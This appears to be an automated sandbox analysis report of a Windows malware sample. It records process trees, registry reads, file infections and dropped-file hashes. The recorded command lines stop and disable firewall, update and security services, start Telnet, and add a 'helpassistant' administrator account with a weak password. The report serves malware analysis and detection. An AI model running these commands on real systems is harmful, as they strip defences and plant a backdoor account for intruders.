File opened for modification C:\Program Files\Java\jdk-1.8\bin\schemagen.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javah.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jconsole.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\UpdatAuto.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A

Runs net.exe

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
N/A N/A C:\Windows\SysWOW64\UpdatAuto.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1512 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 1512 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 1512 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 3136 wrote to memory of 3352 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 3136 wrote to memory of 3352 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 3136 wrote to memory of 3352 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 1512 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 1512 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 1512 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 1512 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\sc.exe
PID 4116 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4116 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4116 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 5108 wrote to memory of 3764 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 5108 wrote to memory of 3764 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 5108 wrote to memory of 3764 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2372 wrote to memory of 1604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2372 wrote to memory of 1604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2372 wrote to memory of 1604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4568 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4568 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4568 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1604 wrote to memory of 1960 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1604 wrote to memory of 1960 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1604 wrote to memory of 1960 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2424 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2424 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe

"C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\system32\Option.bat

C:\Windows\SysWOW64\UpdatAuto.exe

C:\Windows\system32\UpdatAuto.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\system32\Option.bat

C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe

e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sharedaccess

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wuauserv

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wscsvc

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop srservice

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net start TlntSvr

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net user helpassistant 123456

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net localgroup administrators helpassistant /add

C:\Windows\SysWOW64\sc.exe

sc config srservice start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SharedAccess start= disabled

C:\Windows\SysWOW64\sc.exe

sc config wuauserv start= disabled

C:\Windows\SysWOW64\sc.exe

sc config wscsvc start= disabled

C:\Windows\SysWOW64\sc.exe

sc config srservice start= disabled

C:\Windows\SysWOW64\net.exe

net stop wuauserv

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wuauserv

C:\Windows\SysWOW64\net.exe

net stop sharedaccess

C:\Windows\SysWOW64\net.exe

net stop wscsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sharedaccess

C:\Windows\SysWOW64\net.exe

net localgroup administrators helpassistant /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wscsvc

C:\Windows\SysWOW64\net.exe

net start TlntSvr

C:\Windows\SysWOW64\net.exe

net user helpassistant 123456

C:\Windows\SysWOW64\net.exe

net stop srservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup administrators helpassistant /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TlntSvr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop srservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user helpassistant 123456

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

C:\Windows\SysWOW64\Option.bat

MD5 1d04abf39e9df55eed1d04430cc21eb8
SHA1 b8292861dfd4e046eb9625e1571cc08c26094d41
SHA256 0bc485263cf8a962e64db0b88f156f2a9af1b81ecfdb1cf9111d497e85df70f3
SHA512 a2cccc03dadecf6a298b274a6735675aeec1cc280f84432498e9df31aa4a543d2557a2fd06bac4fc8778a774b30bbd31f91c1d0d3ace480b6217654c8d63a7d0

C:\Windows\SysWOW64\UpdatAuto.exe

MD5 c71e745a2d45cb7353c7f527c97c9115
SHA1 15499d15a6ecbd60ab2723c9b61e5e5afc84048c
SHA256 eaf3e2e75aa573c24dfc588b5cc697b1288c826b12f8435d87fabb8a47312906
SHA512 517964a4654f8103330fdb514220eddef69efdfdcc39f70c44f4dd5af1a34175eeaeaf3e1d6224141063a1603a3bdd1e88977c29e6726ecf34ccb4f16bdd93c2

C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe

MD5 72d5165e0744f25f33618830f5fff579
SHA1 a4138dc2ff4eb6e62ce3b7d0891931062bd63de7
SHA256 814cc0aa61ca1827c3c38a4619b974db6c7325c41cb1facd6aec57fd97c54fc8
SHA512 59a2cd04cfc3c329d0e198e32c91ec2911e5d24caf1f1afbfe1dde52700d9e89f82c289b9deed1d819f6265e897f3f5e75ba45cab05b0b0570245fadc39d1cb9

C:\Program Files\7-Zip\7z.exe

MD5 a795016933a1d8bbf00bb0723c615899
SHA1 6ab1545bca8f7c457c78d6598adda038a07780f4
SHA256 a1e8fab09c50885be3506fecfa95e7adf226794357d3f41d5a57a8aa576f0f0d
SHA512 f78ab2bde02404606d5c2905a02032dce50f662b51fbccc7d21072909ff471532c656bc15ca36079624123b5060a9d9bde0a2060254e2bd88f078a6aa0c9c0e7

\??\c:\ntldr~6

MD5 86cf0d50d0f2057e609edffafad2fe83
SHA1 6278efc66dfd2a1c470d184a78469782a4056b8e
SHA256 dc60229c74a6f976f88d5d77f20ede4fe9a2739784d434b92b9855de39b78b2c
SHA512 4c473206b13fb430bf87d97cad928bcc2616aec1f04091482186c4e3a0c6823b70460961650260bf7fbb3b1de87b543da1075869e583ca31da701883cd30a6f2

C:\Program Files\7-Zip\7zFM.exe

MD5 475a755f0a3d639e8ae670eb881b9083
SHA1 965cfd9574116fc600ec7345e3f410c1536729b4
SHA256 5c5e43343405973a96cbccd1755870c3c792399f7c833cb184db3b6a80e52562
SHA512 3ab92fcf5c668be373b9ccef11db2080776371b86b8f1f8ca9f4aefa3d4bf9a0198313f867b0842e762d2daf4ece58a4e15c34169d15db898f6cdc51bf059a2a

\??\c:\ntldr~6

MD5 94262b3bcb689743ec40f352b8318476
SHA1 430f3e532f4f2d372f7bb61913d229f23ed07811
SHA256 860e8c2cc8aebbcfa9443e092aeb74f60d8ea67bd9f02de7684a7a7a1d01864f
SHA512 e90d94c11ac58dac3a4a9f8c4774b6f247b9c30f8ee67d1f716db8331e85c053370fd7954c094a071f6bd76b4f562ed894878d68ee45c81051ea1fb840043ea8

\??\c:\ntldr~6

MD5 b53efdf3b2ef2a2f4edb0ab63e26cc8f
SHA1 f194971a4224ed929a72addbd5fb30a384ded153
SHA256 cf523f76171ade9111ba55dd3a552c7b8cb09340c4170beb2e36b7ae5391b4ac
SHA512 8896d58b507389c0f12dc059ddc8dfb1d23dfb69a60311978b4fb80608b12a5e1480d8cedd68a040ac3483de4511b6bb332afa2b5a0997ad75c8cf65161c5422

C:\Program Files\7-Zip\7zG.exe

MD5 e9055643aeaabb09f3a86c401c4be633
SHA1 10a7c4e942aa17518ede94b677d038e25c069fde
SHA256 b888381b111b8f2e15709481c85cd2e9d6ff3b83cf5284a0ef55d7460e9b6b86
SHA512 2e8cb5c1d922d13d1f8a9d6c193cb98349f0dd7e580b3d307f50f9d5cbd81d1118539e9b93a1d8d97a474d16cae0c4373a01866260eae35ad59692cbdaadad6c

\??\c:\ntldr~6

MD5 b558c6a61dcdf21caf95665f286af3b4
SHA1 8a1f5e78d23000d026cb25e8850af89e80c08733
SHA256 3cb03b1307de92272de4a9812b566312e0c936226d1a00f475c677765144d3b5
SHA512 4aae14c92724e7183c2c4f78bb7861d0db39a3adc02b62a863a6eb77542c91597c09b40a367d19edf37a5872597cfc555082e1a6b24934fdda009ce3dcd95189

C:\Program Files\7-Zip\Uninstall.exe

MD5 c8a418ea7bb8e581ec3b3b704e391f6a
SHA1 4cc9f089d75de54d10d6ec2714b7c80ba1c9891a
SHA256 c9798728c1ed0e072387a16faeb51c82b902d995c2e663b7d9d221c1bd85f01a
SHA512 ad70fc1848b97458a032fcfef5da0b890c2dcdbff5582598bbaeb0182c6236b95596ba556821a9f053c2e6c21e5293f4ce35f8a21a2ab2ac77e368225bbdf197

C:\Program Files\dotnet\dotnet.exe

MD5 a89ed355b9782221c59dc7fc780d5281
SHA1 8cde182c627a9d18da7cf9e65b5949060784b8c5
SHA256 9ea7a2b1410709d964a115b211b9ae5af1c630256a589f4735b1159aca7b4644
SHA512 093efc248e2322aa765d879e17404289cd24fc5ec429552ea3137608c2aebc05949f66ee9456e9f1552f10a96b125fee2a5fe317f0e16ff03057deb559a53149

\??\c:\ntldr~6

MD5 d0d26f542bd552e9f219e25b25b4b4df
SHA1 6d19348480e92a31619233df3eefe31d78cd0be9
SHA256 1efe1ce877fe39e0c5c56ecef572a86c1bdadd6a1cd1a515d94bd45fdd8efb8e
SHA512 63f5805f3dfc2d3c1f32d020174d311f632f9bdcc52d006d585456c2995091dc57a58da5dfb26da8c7038d112d2f523ff142e3de7092fa01fae6cf0c4a1c4ec9

\??\c:\ntldr~6

MD5 3afff3b6c2b6139a24184d05fb4916fb
SHA1 d05785d9b6dd21a7025512ebeb48fd9957218475
SHA256 dc06f2d5574037e20e946cd55bb6fa3c83b94afb0278b27937ab1c02edfcad46
SHA512 83c12d2c81aad3fd906b9858d7197b101a7a69bd785287c4b08077fb881debeb33b0bd50af6de63b1e1768bc5e0df09f3a5eafde2260104f9f25799fc1c8577c

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe

MD5 7199936940f71e16fbb13eae7141885a
SHA1 d2f94d26f6f4043e01529f434bcdf42154d70e32
SHA256 44490fa8da25ff12e003e191c69518ddc47942437b40b95f91be70c8de335238
SHA512 1d3e2c13d9b230c0ef5e059398fc662f5972d5c575bf9ecfe2adeee567a1bbb1741c1907960a8922ebc996f84c2488a40eef2c40d643e8a1425938c4018cea7e

\??\c:\ntldr~6

MD5 b835cea5d0100a77d466f66774bcd561
SHA1 2b14e493947a239eeecbb657215d4de97d610975
SHA256 30e568425d70e4daabdfe869fa23e5c1afcd973d5697b8456bdfc8a14b23c1fb
SHA512 d6e0be7ad2037eebb4cf1836983384e6589c03fc95e00d5c430c3e1f99595ef474c4403db4557864a0ce0f4c391a4ea083f82abd2514c3c5ed4dfae5dab6520e

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe

MD5 8156436bda5efc4dd5e1c3ade5fe1aaa
SHA1 6f8ebf701228e5caf3fe97a0de028cc1cb949a1b
SHA256 a252eff5cb50044719d4884af91fcac02a718db58d995e1dc15756f4e2d2f9fb
SHA512 f4238c53e249781dde5853f65cd88d6a6d0720e0b734957a6e177ab3f5141b53f9600ac95d9a928ab457f1842184dccbb95bafd6b0551eda579328cf87446264

\??\c:\ntldr~6

MD5 b9afc36fb0ac8d3bacba53bb71263a34
SHA1 7678441eff0b2e72eb5c75e09b6db71dc7b75dc6
SHA256 972a05945fdf3039e853ce87e2ba16d5d056dafe79054a9d7809535e5e4b755c
SHA512 e954f829c89ff48735d10f5090fdc4c8d1defacaa86a8383fb2f1333a9133322a60629c53697827c3abe62c2cddf4a63f73dda379c55b9d46a8f4fcdeee71cc7

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe

MD5 5e4b5634d61d255f2d73bae224b7581d
SHA1 4f56711971357b79792bad41ccdb17c1a8d06afd
SHA256 761cfde8e566cc40790f0453cdb558e5c518d1af47fe949ad6a99bb923c9128e
SHA512 cffed36fdeaaf8e2a3ae4f126ee4a4950e580be2cac5f48a80d6281337d705ca61bfbae21fc8558084d08b9a15a71e1c766ff9008fbc0d0a6ebe7ff31ea2267f

\??\c:\ntldr~6

MD5 59187a80135691566d466f1931497d15
